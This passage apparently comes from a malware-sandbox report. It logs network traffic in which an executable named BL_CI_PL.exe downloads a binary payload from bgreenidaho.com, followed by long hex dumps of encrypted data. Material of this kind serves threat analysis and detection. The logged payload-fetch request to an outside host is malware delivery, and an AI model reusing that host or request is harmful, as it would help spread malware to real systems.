2d 47 99 b9
                                                                                                                                                    Data Ascii: \TY~,$Tpmf;iG}|+0l\a)RtnTIt$t-#6EH?e^#B<\RKP,&Q{3n(d}]Lc }XJ \TR^@K`!C6D~OpSd6-G
                                                                                                                                                    2021-11-29 13:11:06 UTC289INData Raw: e8 ef 0b ca 5f b4 de 88 fe 11 09 a0 0b 67 e1 0a 04 80 80 1f 84 15 a5 18 ce a2 ac 07 db 7c a1 00 61 f9 e2 16 9b 09 02 52 4a 42 34 0d 69 5f 8e 88 ab ca 09 d2 0e e6 46 d2 7b 5c e6 c7 93 b9 ea 1a bb da df 61 9d ba 92 7f 39 73 5c ad 63 97 ef 83 b0 ae 44 ed 85 1e 00 53 78 ff ed 38 5a 52 27 da 53 60 4e ce b1 e1 d4 ec 11 0c ba 69 fa 67 40 71 82 ae 05 89 a6 02 5f c8 32 aa 75 c6 df 12 6b 07 2e 78 ba 0b 39 db 10 f4 89 2d e5 b6 1b ca f7 8e 48 a8 18 96 cf 7f d6 e0 52 4d 38 47 a8 dd 79 be 0e ca 5a ea 80 63 b3 87 0f 7c b8 34 0c c4 f0 f8 9e 95 80 34 14 18 74 10 49 a4 ec a4 7a ed 98 1b d3 65 eb 9b cc d5 56 66 94 f8 29 14 25 92 f8 b6 ff 28 85 6b f8 30 e1 13 d2 9d 2c ec e2 18 c9 e0 8b fd b9 2e f1 7b 3b 0f b2 10 bf 76 41 d2 dc 75 b6 a0 19 9f 4b b2 62 68 7c 5d 2b 70 ec c2 37
                                                                                                                                                    Data Ascii: _g|aRJB4i_F{\a9s\cDSx8ZR'S`Nig@q_2uk.x9-HRM8GyZc|44tIzeVf)%(k0,.{;vAuKbh|]+p7
                                                                                                                                                    2021-11-29 13:11:06 UTC297INData Raw: 03 61 ab b3 e6 13 ca ab 03 8f 95 5c 2e e3 b5 72 2e 99 4e 75 28 2d 6a e3 ac af 03 98 b0 de b0 12 92 04 54 d1 5b ab 26 4d 01 4e 47 1d 79 97 78 a6 1f bd 1f e5 30 d8 d9 2f 0c 9c 12 56 ed cb c6 a7 aa be de e8 6d 3b 39 eb ac d0 ad d5 46 89 fa e9 90 f3 61 c9 ff 06 de d3 14 27 15 60 12 31 c5 90 88 c5 ae 36 7a ef 73 6b 9b 32 ec 42 47 f0 2c 13 82 97 d4 a9 bc 91 4a fa 04 c1 b5 b4 26 f8 20 a7 c0 5f da 90 78 1c d4 6c 1c 2b b3 70 a9 58 78 14 cd 9b 75 d3 4d 1f 40 75 53 42 71 b8 70 72 53 9c d2 04 c2 0b aa 70 b7 42 19 87 70 c3 1c 82 4f fe bb 3e 74 bc 54 b5 c3 24 12 e0 88 92 03 65 7d 08 0d 58 82 98 db eb 22 3f f8 ee a1 bb 4e 34 be 55 da ca c5 61 2b c4 1e 4b 45 11 b9 e5 cd e3 bb 2c 14 17 7c b5 70 b9 18 05 fa 67 d4 b6 81 8e 2a e7 6d 85 ed fa 5c 7c 91 fa d7 81 70 4b 0f a4 42
                                                                                                                                                    Data Ascii: a\.r.Nu(-jT[&MNGyx0/Vm;9Fa'`16zsk2BG,J& _xl+pXxuM@uSBqprSpBpO>tT$e}X"?N4Ua+KE,|pg*m\|pKB
                                                                                                                                                    2021-11-29 13:11:06 UTC304INData Raw: 24 6b b9 9c 18 4a ed d6 92 c7 13 48 f9 66 09 7b eb eb 5d 94 b3 93 c5 79 7b df 15 70 58 ea 64 89 f2 20 9b e6 cb d7 17 09 f2 2e a4 6b 2e bf a8 cc 2f 74 a7 c2 b5 3d f1 57 86 3a f2 39 df 10 61 18 fa 5c 56 17 70 87 bd c2 92 5e da 97 ec 20 0a 03 20 98 cd b8 b3 87 55 81 3a 15 3a f4 97 6a 71 3d c8 da 12 24 30 45 63 23 87 4e fa 56 79 b3 32 94 95 91 76 e2 70 30 2c bd 86 4e b0 03 17 6d 76 4f 11 a6 18 28 41 d1 cc ba ee 83 13 08 ff 41 69 c7 5b 69 1e 4b 1f b3 35 5c 02 6e 38 d2 26 a0 e7 df b8 78 00 72 55 5e 54 11 42 bd f3 9e 34 f6 44 44 8c 33 f2 7d ae 52 22 4d 58 bc 1a 52 22 46 13 17 e6 77 82 3b 50 f0 7d de c7 ba 20 23 59 07 e9 9f 7e f1 55 2f 63 18 f8 18 78 2e fc bb a2 22 81 99 6c 58 d6 fb a7 99 3f 6a 25 7f 5e 0d c4 98 1c 23 05 1f 0b 5a 16 ea 1c d3 db e6 2e d6 f7 c3 2c
                                                                                                                                                    Data Ascii: $kJHf{]y{pXd .k./t=W:9a\Vp^ U::jq=$0Ec#NVy2vp0,NmvO(AAi[iK5\n8&xrU^TB4DD3}R"MXR"Fw;P} #Y~U/cx."lX?j%^#Z.,
                                                                                                                                                    2021-11-29 13:11:06 UTC312INData Raw: 70 2a 6b d0 cd 09 a4 bd 55 5a c6 69 3a 07 ea 10 a3 7b 72 ae f3 73 01 d3 49 6f fb e2 9c e0 4d a9 a7 c9 40 fb cc bc a9 8a 37 d5 cc 99 7b ed 9c f9 4b 87 c1 8e 15 c4 79 1f 01 3d 58 5b 37 4c 43 a7 2c f6 92 d4 da 5f a6 7e e8 3d d6 5b 61 4f e1 85 d8 e7 f6 b2 d7 0f 1c 00 6c 15 7d 47 5d 4c 51 ff 77 6a 6a cf 2d e8 59 6f 79 45 64 2f dc 7d 7d 76 3d 9b bd c5 ec 78 7d da 3c 5e af 0c c4 2c d7 f9 08 02 22 bf c7 de 68 0d 3c 78 87 62 8f aa 92 1e 1c cb 9f b1 aa 97 73 e8 d7 2f dc 2d 03 72 b6 09 dd b5 c4 1c 4b 5c 21 0e f7 af f9 19 2c 3d 06 4b a7 c6 fb 2a 50 7a c1 ab 08 0f 1b a1 b7 fa d2 25 a7 68 6c cf 24 3d de fd 38 31 ba 2f ce c8 cc 0e 4d fa 66 e5 2a 8f ce 44 7c 0e fe af 32 d5 d7 d7 5f d6 85 32 41 19 0e af 61 86 34 f0 82 7a e5 53 86 a2 14 ec 3d ba 5b b4 5a b3 95 bb 1c c0 fe
                                                                                                                                                    Data Ascii: p*kUZi:{rsIoM@7{Ky=X[7LC,_~=[aOl}G]LQwjj-YoyEd/}}v=x}<^,"h<xbs/-rK\!,=K*Pz%hl$=81/Mf*D|2_2Aa4zS=[Z
                                                                                                                                                    2021-11-29 13:11:06 UTC320INData Raw: e5 7e 68 7d 58 14 5b 59 d3 e0 53 00 e1 8c 06 04 b3 26 f5 28 e2 04 7f d7 c9 67 cf 98 35 da d6 5b 3b 34 4c bf 7a 0d 84 20 81 a9 38 b1 e0 a3 79 df 9c 6f 62 20 df 05 60 79 a1 a1 2c d1 2e 3a 6f e6 4b 4c 36 aa f6 a3 39 c1 68 82 08 ea 41 5c cd 27 93 8f f8 9f de 74 53 91 b3 be b0 63 3e a7 ff f5 a4 b4 48 1d 4a f7 29 83 4b 87 bb 23 80 f2 38 1b 4f b5 62 c2 96 3c 37 13 61 dc f0 8a 9b 7f 01 8d 1e cf d4 84 e8 0c 48 b9 57 1f cc 3e b4 74 1e c8 df 25 f3 8a c1 ba 6e fc 9e 7a df d4 11 bd 5c 26 9b 28 92 98 89 8e 7c b3 9e de 16 fc 82 72 14 b8 aa cf 94 6f 9a df d0 a8 f9 aa ab ea e7 da 27 4a 3f 76 af 49 62 7f a3 46 47 0b 8b b0 da 53 c9 d5 54 5f 26 46 e1 0d 52 16 71 95 11 13 bc a9 f2 15 f4 ac 34 83 08 b4 85 74 d0 c9 78 bc 4b e1 62 b6 2d bc 29 1a fe c3 f3 10 e9 5d 10 2b 22 c1 80
                                                                                                                                                    Data Ascii: ~h}X[YS&(g5[;4Lz 8yob `y,.:oKL69hA\'tSc>HJ)K#8Ob<7aHW>t%nz\&(|ro'J?vIbFGST_&FRq4txKb-)]+"


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.11.204984520.124.109.2443C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2021-11-29 13:11:15 UTC327OUTGET /Newfile/bin_UFDek247.bin HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Host: bgreenidaho.com
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    2021-11-29 13:11:15 UTC328INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:15 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Last-Modified: Mon, 29 Nov 2021 09:03:01 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 167488
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    2021-11-29 13:11:15 UTC328INData Raw: 92 59 6a 3b 87 e0 3e ba ac 61 1e 9d f6 c9 df ba 62 bf e5 c7 7a c4 9c 08 b1 4e d4 60 c3 3f d4 88 b8 72 47 b8 2f 6d 29 8e 33 82 67 e5 01 50 d3 29 cc 40 5b 5d d3 b4 13 93 10 4a 50 4d e4 45 c5 38 95 37 99 7a 58 85 3e c8 30 3e 65 a5 f1 fe 32 8e d3 0c 06 d8 57 89 63 8e 2d b5 ba 39 47 6b 5f 57 9b 95 58 e8 89 7f c2 84 8b 82 7f 21 b0 74 fb 78 9c c8 8f d1 65 3f d7 2e cb cc 0b 54 47 5e 2f c7 a1 2c 6b f6 3f 5b 51 cf 76 c1 f9 8b 60 85 31 3f f8 03 5d 7b bb 1c a8 30 fc f2 c4 c6 f9 be be 63 ee 83 51 53 d6 e2 15 c0 de 05 51 54 88 de b8 29 a5 de 6e be aa d1 f5 66 37 e8 52 f1 1b 6f 68 66 6f e6 bd 78 7f d6 c0 a9 24 5b b0 50 cd 2d e9 55 b7 e6 0d 63 45 ab 40 4c f6 ff 26 1e fa 8d 35 6d c9 f8 cb 43 fc 85 ce aa 17 53 9f 60 07 33 3b 17 8c ab 3b 8a 39 94 cc f5 24 ed 10 4c b0 a4 6c
                                                                                                                                                    Data Ascii: Yj;>abzN`?rG/m)3gP)@[]JPME87zX>0>e2Wc-9Gk_WX!txe?.TG^/,k?[Qv`1?]{0cQSQT)nf7Rohfox$[P-UcE@L&5mCS`3;;9$Ll
                                                                                                                                                    2021-11-29 13:11:15 UTC336INData Raw: 28 0f 58 ee 0d a9 e5 f4 84 21 ce b3 15 95 9c 98 9d 51 9c 90 7b 9f 34 b8 00 25 94 b8 77 00 7a 36 cf 99 e3 4e fb 73 3d 88 5b ce 72 27 55 be 16 b9 c2 33 fe 38 59 04 4d 59 95 89 9f 6d d9 81 3d 7b 28 e3 1e e3 77 f1 af 86 63 37 d0 e4 50 55 10 ab 93 32 f4 ab 06 09 78 69 68 b6 8d 06 c0 10 88 bb ee 10 3f 42 cd 5a 9a a8 00 f6 fb 1c 0e f6 ab bc 62 60 bc 64 59 49 17 89 f2 5d cc c9 d1 8d 7d 94 39 e9 53 8a 33 6e 52 97 56 96 cd 5e f4 22 07 93 2b 09 b3 28 dc ea 1c 98 ed 7f 91 9b be 3a 56 64 65 a2 1e e7 47 b2 20 36 52 f9 8b d5 cf 53 22 15 c5 47 2e d3 40 74 9b da 50 0b 6e d9 03 07 1b 1c ba c5 8c d1 e7 9d ad da 04 55 c4 75 b0 1a 42 f2 b3 2d 9c b2 03 5a ca 3f 4b 1a 60 32 50 95 f6 64 d3 06 c5 8f 8a ce 5e 8f 6d aa 17 56 37 03 a1 c6 bd 3f e7 1f ae 19 40 7f a4 fd de 2a 95 3a cb
                                                                                                                                                    Data Ascii: (X!Q{4%wz6Ns=[r'U38YMYm={(wc7PU2xih?BZb`dYI]}9S3nRV^"+(:VdeG 6RS"G.@tPnUuB-Z?K`2Pd^mV7?@*:
                                                                                                                                                    2021-11-29 13:11:15 UTC343INData Raw: 87 15 4d f1 2e 9a c0 5e 6b 49 aa 82 11 79 99 6a 4f 9d 1d e4 f8 b6 aa d4 8b 12 e9 71 82 39 63 20 8b c9 3c 33 4c af b4 8a a2 a7 9f 6d e0 7a 59 95 ea fc 2a 76 dc 77 57 60 8e fe 6c d7 ab b8 91 eb 8a 0c 89 8f 1b f1 da a7 32 98 0d 0f 32 96 fa 18 9f ed 7f d1 31 ae e4 f4 e0 1d 5f 21 48 79 af c8 e4 6a 83 a7 c3 76 e1 11 04 59 28 35 07 49 cf 88 a8 74 c6 83 0b c4 6a 6b 86 44 3a ac 85 6b e8 38 0c 64 b2 59 8b 39 c7 24 16 10 a9 10 c1 78 9d c9 2f df 29 f7 dd e0 e2 4c 93 ee d8 b2 c8 5d c6 84 6d c2 04 dd 6f 4d 3e 66 29 25 4c 55 68 6d cd 2f 81 06 79 42 5f 3f cd 68 22 02 53 a7 02 a1 a0 17 c3 22 b8 fd 39 a3 38 46 86 86 ec 99 17 52 90 2a bb 1d 9b 03 a7 df b6 00 74 62 1b e5 db 11 b8 85 ef 2e 00 fa 82 3a dd 04 cd b8 87 2a d6 37 84 1a 19 f7 ad 8d a9 bc 17 37 d3 06 02 64 8a 71 ed
                                                                                                                                                    Data Ascii: M.^kIyjOq9c <3LmzY*vwW`l221_!HyjvY(5ItjkD:k8dY9$x/)L]moM>f)%LUhm/yB_?h"S"98FR*tb.:*77dq
                                                                                                                                                    2021-11-29 13:11:15 UTC351INData Raw: 73 80 90 04 06 a6 90 12 64 e6 ad ec db 43 46 9c 9e 64 f3 5c e1 18 74 95 54 97 95 7c f7 78 bd 33 fd 8e d4 65 e6 d2 19 8a 64 25 68 1d 2f 0b cb 06 50 e2 45 3a 7f 77 6e 34 65 db 49 ab 3b 8a 6f 1f b9 fd 1e a8 7a 59 af f3 85 09 03 29 a7 34 04 7b 8c 5b 10 df d3 25 21 12 ea 71 1b d3 55 43 29 3f ed 04 0d 96 4e 69 ba fa cc 6a 63 90 0d 28 95 3a 68 22 4a bc 63 25 33 71 dd 20 43 43 52 2e f6 9d 4f 03 c5 5d 84 ca b7 13 a6 1f 94 9b 77 bf b5 b6 8d a6 91 01 47 e7 73 14 15 c2 3f 52 ac 6a 77 e9 b0 a8 3a 43 b9 97 fb 9a 49 fe e2 84 92 4a 03 e3 ba f8 45 69 0c 8c 62 5d 5d c1 a3 08 a1 27 0c d4 3d 6a 7d 2b b2 61 73 c6 3b 78 26 0a 62 e1 ca d9 cf bd 9c a8 11 a3 c8 23 c0 52 c6 28 7c 8a 32 b8 5a d2 aa 1d 41 2d 67 c8 bf d3 20 3c 90 fe 9e 0b 03 6f 9c fd 32 6c 86 00 0c 61 9c 38 c5 01 8c
                                                                                                                                                    Data Ascii: sdCFd\tT|x3ed%h/PE:wn4eI;ozY)4{[%!qUC)?Nijc(:h"Jc%3q CCR.O]wGs?Rjw:CIJEib]]'=j}+as;x&b#R(|2ZA-g <o2la8
                                                                                                                                                    2021-11-29 13:11:15 UTC359INData Raw: 28 61 57 20 d6 2c 66 92 3d 80 15 11 96 5e a2 a5 f0 7c 71 92 d6 f1 50 ac ff 69 c7 57 c0 18 e0 d4 55 db 6b 63 c1 40 d4 6a c5 c0 a8 46 b4 36 5c d0 d9 74 9a 21 79 fb 58 f0 55 bb 79 fa c0 2b 22 ec d4 a2 7f 15 1e b7 b1 31 f3 8c f9 1a b3 70 10 cd ae fe c2 26 51 3d c7 82 35 b0 a8 b9 6f 97 36 3a ee 97 d9 1a 82 0e a8 d9 37 5e 2e f9 97 5c 51 7d 73 2e ca a3 60 e2 03 f0 86 f1 c0 2e 2a b6 9a 9b 45 7e 80 47 68 ab b2 47 16 d4 05 f5 cd e0 64 00 c2 8c 03 91 7e 1d c1 da 50 18 67 6f 3d f9 2e 3f 34 42 46 6c cc 4a 8b 46 f2 a1 6a 9d 42 ab cb 2e a8 dc f2 6b 6d 8c b0 64 bd a8 eb 2d d5 41 56 7a f2 b5 e3 09 62 f1 8a b1 58 9d d0 08 4e 9d b3 ff ad 3f f3 81 aa d2 17 4f 0f 88 95 de f0 80 de 96 92 d8 fe 78 0b d7 8c 94 6c 9a 9c db c7 73 ad 77 11 c9 c0 f4 5e 18 74 cc 4a e8 41 e9 c1 2b 1b
                                                                                                                                                    Data Ascii: (aW ,f=^|qPiWUkc@jF6\t!yXUy+"1p&Q=5o6:7^.\Q}s.`.*E~GhGd~Pgo=.?4BFlJFjB.kmd-AVzbXN?Oxlsw^tJA+
                                                                                                                                                    2021-11-29 13:11:15 UTC367INData Raw: 38 e2 b4 07 99 20 1e e3 05 1f 6c a8 42 01 3d c7 c2 59 b0 c4 b9 e1 2a 28 1b 9b 03 11 62 7d d3 9c d7 88 72 a7 00 eb e6 05 bc 88 a2 4c af 60 39 d4 6b f0 1a 93 a1 3a 3f a9 c3 4e 80 b2 74 74 d8 b7 35 ac dc 5a 1d 56 09 66 0e 76 aa 27 c2 9b 95 6f d7 3b a3 0d 1a 3a 41 ac 17 af 0f b5 79 4f 01 77 9b 2e 17 3c 23 cc 62 3a d1 d4 9b 32 60 28 2a 36 e6 91 73 9e 02 d3 92 b2 e9 07 c7 fe 70 7e 53 33 12 9c 6e 2f 7c 83 5d 36 66 79 08 c9 7a 07 52 5f 4a 0e 88 4c 70 9b f3 37 a5 18 5c fa 01 30 38 df d9 87 a7 64 7b 66 79 ce 5e 65 0b 80 90 45 6a ac d2 12 9d fb 1a 10 ad 77 a0 7b 45 5b 48 83 de b5 77 2b ce 70 c2 8e 05 df 33 07 d6 e8 01 07 f6 65 ca f2 fb 6e be e5 67 2f bf 66 45 b1 43 f9 e2 f3 34 26 ce 54 41 29 3f 6a 95 10 50 e6 51 a9 0b 83 05 d4 ae ba 15 3e fe 31 49 ce db a6 e2 93 39
                                                                                                                                                    Data Ascii: 8 lB=Y*(b}rL`9k:?Ntt5ZVfv'o;:AyOw.<#b:2`(*6sp~S3n/|]6fyzR_JLp7\08d{fy^eEjw{E[Hw+p3eng/fEC4&TA)?jPQ>1I9
                                                                                                                                                    2021-11-29 13:11:15 UTC375INData Raw: 8c e7 6c 7b ad 45 ec 84 d3 b8 b9 d7 c4 6e c1 85 15 79 d3 ba b6 1b 24 c1 73 48 63 55 b5 4f ef 65 c7 2e a8 0f 60 8b ad af 40 1f 98 25 eb d1 a7 3b e7 6b 54 a2 b3 84 45 00 56 e5 de 6f d3 08 32 33 b1 25 6e 63 2a 9d aa 45 79 4e 82 1d c7 ca 60 5c 8d 1b 5a 55 aa d4 1c dc 25 e6 1e ad a6 10 bd e2 4a 3f ba c8 c0 77 17 85 f9 a5 01 e9 ef fe 8e a9 67 25 b8 f0 0f 48 e0 db 7d 1f 2f 42 e5 c2 22 77 65 99 07 d6 df f7 06 f6 6d 4b f2 27 12 b3 60 a7 5b d3 85 a0 fc 80 93 bf f3 fc d6 63 43 b9 6a 68 82 d4 bf a7 94 89 d4 59 f2 bf d3 af 38 cb 88 16 45 11 92 db 95 2b 76 74 a7 22 ff 15 43 1c 88 2b 7c 8a 8f 28 0c 89 6f ca 4a fe 6e f1 b0 36 13 47 6a f8 f6 0b 40 73 aa 99 20 6a b7 f4 aa 07 dc c1 0d d8 f6 e4 0f c7 25 a8 cb 3e 99 f4 cb a2 99 29 c6 fb e2 5b a3 b1 1b 1b b8 5b 2e 62 d0 3e 1b
                                                                                                                                                    Data Ascii: l{Eny$sHcUOe.`@%;kTEVo23%nc*EyN`\ZU%J?wg%H}/B"wemK'`[cCjhY8E+vt"C+|(oJn6Gj@s j%>)[[.b>
                                                                                                                                                    2021-11-29 13:11:15 UTC382INData Raw: 3e 9f 4e 0f 88 af 1d ce 93 fb fc 1f 37 fa d2 a7 c0 06 7a e1 2e e1 e0 2c ab 03 ff bd 08 b4 05 11 4d f5 dc 3e 62 bb 9f d5 45 8c 22 7c 76 5b e3 66 83 76 75 27 42 35 6e 8e 05 d4 83 06 f9 ce 20 06 f6 ee 67 fa be aa b2 ed 38 07 cd 0e 45 f2 ab 05 7a 7e 79 d5 5f ec cb ad ce 62 1e 5d 0b 39 ec a5 9c 0e 40 7a 73 95 f9 3f 41 ad da c2 db 95 7d 47 15 f9 a2 ff e9 37 6c 01 a4 7c 76 21 80 b4 dc 6f 2d 4a 7d 27 45 ae 69 57 b9 95 a9 a0 bd 8c 61 08 a5 f8 f1 a4 b1 34 83 bc b9 31 25 18 95 27 f6 2d e0 4d be 1f 3f 9e f4 71 03 17 c4 75 cd bd b3 19 4b b8 5b 6c 63 d0 3e 1b b9 b1 05 d3 0e 7b 15 c3 2d ae fb 7c 97 b3 64 30 2e 27 5c e2 1d 62 64 99 15 eb d4 43 1a 4b 42 3e 3e 5f a4 59 a3 4c af 12 ff 35 26 c1 31 45 74 24 bb e0 80 a8 1a f6 ae 3b a8 69 b0 76 c4 0f 17 3f 92 2d de 3c 72 2b d5
                                                                                                                                                    Data Ascii: >N7z.,M>bE"|v[fvu'B5n g8Ez~y_b]9@zs?A}G7l|v!o-J}'EiWa41%'-M?quK[lc>{-|d0.'\bdCKB>>_YL5&1Et$;iv?-<r+
                                                                                                                                                    2021-11-29 13:11:15 UTC390INData Raw: 60 a7 5b 06 5b 49 cb 43 ab 3f fb 81 2b 60 43 16 d2 54 c1 1e 5d d5 e6 fc a4 a6 f1 11 c4 10 79 15 6f 95 81 bb a8 58 29 6e e6 00 cc 98 a3 9d a0 6e 90 56 81 89 8f 85 b4 b5 03 2d 4a 47 bf 7d f5 36 6c 7c 91 cf 29 6f 42 7c a8 99 5c 25 c2 69 e1 4d 49 b6 a2 aa 84 42 79 dd 87 3a 49 8f 5a ff 9c 79 e5 10 dc f9 e2 cc 3f 77 1d 49 dd 16 da 61 d0 4a 3f d7 52 80 f9 e6 09 6f d3 cb 97 04 2c f2 9b 22 46 7e aa 52 6c fe 18 5b bc 8b e3 19 44 18 4b 93 6f 0d b7 0b 25 18 4c d3 29 8f 6b c8 24 0a 0f 72 94 46 6a 40 cb 80 27 f8 d3 f9 09 da 58 c5 d4 c9 d8 d0 bc 73 8b fc 2b 93 71 f3 f3 4e e5 0e 0f a9 ba fe 30 7e 09 b5 53 27 a4 73 28 cc b0 a9 c4 de e3 9b 96 c1 86 af de 7d 13 89 91 5f 88 da a5 f7 bc ed bb 2a b3 99 08 f3 26 61 7a 47 77 57 6f 41 a0 b2 4a a8 7a b2 71 00 07 44 36 a8 71 a2 27
                                                                                                                                                    Data Ascii: `[[IC?+`CT]yoX)nnV-JG}6l|)oB|\%iMIBy:IZy?wIaJ?Ro,"F~Rl[DKo%L)k$rFj@'Xs+qN0~S's(}_*&azGwWoAJzqD6q'
                                                                                                                                                    2021-11-29 13:11:15 UTC398INData Raw: ee 55 0c a3 fd c1 f8 2d 0c b1 85 d7 27 09 d2 b6 6c 58 23 cb 3f 99 ff cf a2 f8 12 2c ec 53 16 bc b3 9a df 65 be b2 8f d4 70 20 df 52 80 c0 a5 0d ad 27 de 50 de 7c a4 1b 40 e4 82 37 bb a8 88 9d c8 9e 5b 29 84 54 c0 91 6c 3e 31 60 ea 9b f3 3e 15 2c ed 35 13 07 12 0c f1 84 45 97 7f 40 78 7e 6e 51 9d f1 32 8e 06 82 42 20 95 2a c9 ea ba c7 12 0d c8 68 13 a6 be 6f a7 34 fd e2 f6 84 30 ab 51 1e 84 12 69 bf b5 1f 05 68 ce ce 26 0b 3d 23 d1 ba 30 1b 93 77 21 30 37 b2 a4 ee 8b c7 83 3f 30 81 50 eb df 54 ea 87 eb d4 a1 cb ac 8c 36 71 00 d9 87 21 3f c2 5f 4d 6b e2 4a f7 1c 69 8c f1 8b cd fd cf 85 83 12 c9 0a 38 82 5f 9a b3 c6 a0 36 03 52 12 83 7a ce 57 3a 81 95 4a 23 8a a5 c6 d6 09 18 ce 7f 30 3d 0c 7c 0e cd 0e 30 bc bd 6a fe af ae 52 e0 f9 7a 8f 7f c6 53 db db 4f 8a
                                                                                                                                                    Data Ascii: U-'lX#?,Sep R'P|@7[)Tl>1`>,5E@x~nQ2B *ho40Qih&=#0w!07?0PT6q!?_MkJi8_6RzW:J#0=|0jRzSO
                                                                                                                                                    2021-11-29 13:11:15 UTC406INData Raw: b3 6c 3e 58 96 32 57 e8 e3 03 bf d5 67 12 97 bf c7 bf 6c 44 94 68 12 a3 b8 76 d3 4b ee da 58 16 46 72 28 1b 92 07 37 d4 c7 94 f2 37 68 86 cd 25 75 af eb b3 3d a7 61 6d 68 59 a2 80 0d 65 64 10 23 1a a2 c1 1a 35 f4 a8 dc d0 65 8d 3b 3a 22 d9 08 58 b4 2e 2e b5 e4 30 55 30 81 8a c6 c7 f8 6f ad 14 7b 08 23 42 6c b1 71 8b 5b 43 37 28 40 ee 27 69 3b e7 9f 0c ad bc 23 50 d6 89 d5 27 10 c7 d8 94 b6 f9 91 10 6b 45 e7 f7 88 86 99 2f fa ce 57 b9 10 e4 b6 68 44 41 22 bb 09 4b ca 1a f3 e1 5c f7 e0 99 c5 e2 ad 86 e1 9b ff ae 56 3b ec 37 31 85 b7 ab 33 d5 ba 08 aa d8 a2 50 e8 d9 89 4f 6b 7b 66 06 6a d1 88 48 7e 1f 20 8c 40 29 66 2a ae 23 e8 f0 7f 12 9f 89 23 67 71 e5 ed a2 e7 0d 38 6d 2f c7 8f fa 7f a3 7f 30 68 c1 a8 b1 34 3a 99 2c 41 a7 4f 37 84 1c 50 0e 54 f6 a4 c6 32
                                                                                                                                                    Data Ascii: l>X2WglDhvKXFr(77h%u=amhYed#5e;:"X..0U0o{#Blq[C7(@'i;#P'kE/WhDA"K\V;713POk{fjH~ @)f*##gq8m/0h4:,AO7PT2
                                                                                                                                                    2021-11-29 13:11:15 UTC414INData Raw: dc cf d1 bb 9b 53 27 e7 6a d2 9d a9 77 5e 8f 69 27 e9 cf 85 45 a6 df b5 f9 cb 1c 29 70 7c b6 29 e0 12 d6 a6 7e a5 00 89 26 be 7b f2 da 1a 49 7e e0 53 bb 5b 64 1a c7 c5 ec 68 7a cf c8 0b 9d 99 3c 50 70 23 2e d1 3a fc 4b a4 70 ad ce 1c ee 1a 5a cc ae ce 93 c2 a0 c9 d8 d3 d8 01 81 3f 92 21 82 42 f7 00 6f f1 ee 00 22 a3 06 a4 b3 cc 43 3a 9e 2f 63 d3 52 05 ff d2 e6 c4 94 97 9a a1 3d 56 d6 61 af 08 55 49 5e 42 fb c1 54 68 5e 6c ce 27 91 64 4c 83 bb 88 d6 6e 93 bc 17 ef 38 5a 31 c4 cf a9 8b c3 e8 66 8a 6f 11 43 10 6a 18 5e 45 19 fd 17 35 7e f3 54 bf ea e2 21 19 12 2d bd 29 44 5a 2e 9f 04 86 bc 4f 49 3f 9a 8c 6d ae 85 a0 54 7e 92 9d ff 2b 42 f4 45 72 42 11 04 1f 3e 57 a8 a7 e2 04 35 fc 20 78 19 ef 52 da d4 d9 22 e2 e5 ff 17 fb 70 ec d9 e2 a5 68 5c 53 c7 45 4e b3
                                                                                                                                                    Data Ascii: S'jw^i'E)p|)~&{I~S[dhz<Pp#.:KpZ?!Bo"C:/cR=VaUI^BTh^l'dLn8Z1foCj^E5~T!-)DZ.OI?mT~+BErB>W5 xR"ph\SEN
                                                                                                                                                    2021-11-29 13:11:15 UTC422INData Raw: 70 bb 5b 50 eb b8 4a 55 27 2d 00 43 f6 21 9b c0 3f 5f 08 94 b1 bf 3d 1d c7 d3 3d 1d e9 f5 ec a5 78 99 98 66 e7 04 52 f5 fb e0 6b 95 4a fd d4 37 f3 88 2d 6b 0d 74 9c 71 29 9a 78 48 a9 ca 0f 4a 28 b1 92 5f 7b ec 5d a4 52 1f c3 cd b7 1a 9b 64 db c0 17 9f 2a 1e 42 60 93 3b b9 cf c6 fb 2e e9 ee 2e ef 96 97 37 58 ee a3 12 07 0c 05 8c 1a 31 2c 95 c9 94 f4 ca d2 53 17 89 ba 81 27 92 b6 38 e7 0c 78 f8 d8 00 20 b2 07 1f eb 5a 9a 76 b9 30 0f 8e 1f b1 6f a4 e5 4f e0 c3 b7 07 5d 6a a7 82 9a 28 4b c2 b7 6a 3a e7 4f 8b 78 bc dc a2 99 86 ec 79 97 c6 fc 0a f4 ab 95 44 78 4e e9 7f 39 d4 f9 10 a7 68 4c f0 be 9b fa 4c 44 91 6e 8f 17 17 9e fa 89 22 75 89 22 5a 67 ba f6 5b 13 e5 57 de fd 56 9f 51 94 4b 68 fd 8a fd 03 09 0e 4e f5 b1 ac 8b 71 2a 63 00 a7 34 e4 90 02 4f 45 09 c4
                                                                                                                                                    Data Ascii: p[PJU'-C!?_==xfRkJ7-ktq)xHJ(_{]Rd*B`;..7X1,S'8x Zv0oO]j(Kj:OxyDxN9hLLDn"u"Zg[WVQKhNq*c4OE
                                                                                                                                                    2021-11-29 13:11:15 UTC429INData Raw: 2d 14 5c a0 88 2c 26 05 bf d4 1b 5c f7 6f 4d 51 f7 97 f8 1b 91 21 91 23 be ec 28 fb f7 55 0d 2c 54 35 97 b5 d8 80 cb 67 2d 96 76 27 5c 29 9b 0e 9e d7 30 af e6 c0 6d dc 28 39 c0 c2 43 75 9a 6d 0d d8 fe 1f 50 d0 fb c7 4a 8b 76 db 69 35 e8 e7 4d 4a aa 3b f6 83 95 58 e8 00 3a 3e 0f ce 8a f4 29 3b 21 07 f1 16 08 8f d1 65 b4 32 73 08 00 5e df 13 0f 4b 66 b7 33 d1 f8 b6 aa a4 89 12 85 73 47 6d a4 65 57 1a 95 20 c8 2c 39 52 8c 2c 49 b1 2e 74 81 b4 ad 82 a3 33 36 7d d0 50 27 bb 90 b4 31 30 1a ab 01 43 54 57 18 ee 8e 67 b4 2d 6f 07 7a f7 ec 84 6e 44 d7 e6 c2 5e d1 91 e1 96 1c d1 91 b1 d6 33 58 69 f7 bf 27 b9 e1 e9 c3 91 99 e9 56 c0 8a ef 60 13 e9 47 07 4d c7 63 